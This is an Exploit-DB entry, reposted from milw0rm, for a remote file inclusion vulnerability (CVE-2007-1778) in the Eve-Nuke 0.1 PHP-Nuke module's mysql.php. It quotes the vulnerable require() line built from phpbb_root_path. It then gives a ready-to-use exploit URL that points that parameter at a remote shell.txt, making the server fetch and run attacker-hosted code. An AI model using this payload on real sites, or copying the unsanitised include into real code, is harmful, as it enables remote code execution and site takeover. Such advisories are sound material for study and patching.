PHP-Nuke Module Eve-Nuke 0.1 mysql.php RFI Vulnerability

2007-03-27T00:00:00
ID EDB-ID:3591
Type exploitdb
Reporter ThE TiGeR
Modified 2007-03-27T00:00:00

Description

PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability. CVE-2007-1778. Webapps exploit for php platform

                                        
                                            #===========================================================================================
#Eve-NukePortal file include (phpbb_root_path)
#===========================================================================================
#
#Script name :Eve-Nuke Portal
#
#Download script : http://puzzle.dl.sourceforge.net/sourceforge/eve-nuke/en-forums-beta.zip
#
#===========================================================================================
#Vulnerable Code :
#
#require($phpbb_root_path . 'includes/functions_nuke.'.$phpEx);
#
#===========================================================================================
#Exploit :
#
#http://www.site.com/modules/EN-Forums/db/mysql.php?phpbb_root_path=http://www.site.com/shell.txt?
#
#===========================================================================================
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#===========================================================================================

# milw0rm.com [2007-03-27]